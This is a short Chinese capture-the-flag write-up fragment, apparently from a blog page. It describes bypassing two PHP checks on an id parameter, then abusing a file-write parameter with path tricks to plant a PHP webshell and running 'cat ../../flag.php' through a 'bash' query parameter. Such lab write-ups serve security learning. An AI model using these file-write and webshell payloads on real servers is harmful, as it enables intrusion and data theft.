要你:
(1)floatval($ _ GET [id])!==‘1’ //浮点不为1
(2)substr($ _ GET [id],-1)==='9‘ //id最后一位为9
构造:
1 9
1-9
都可以绕过去。
构造一波:
file=p.php/.&con=
访问/uploaded/backup/p.php即可。
接下来换一个构造一句话或者像我这样:
file=…/123.php/1.php/…&con=
直接再访问/uploaded/123.php?bash=cat ../../flag.php
查看源码就有flag了.
手机扫一扫
移动阅读更方便
你可能感兴趣的文章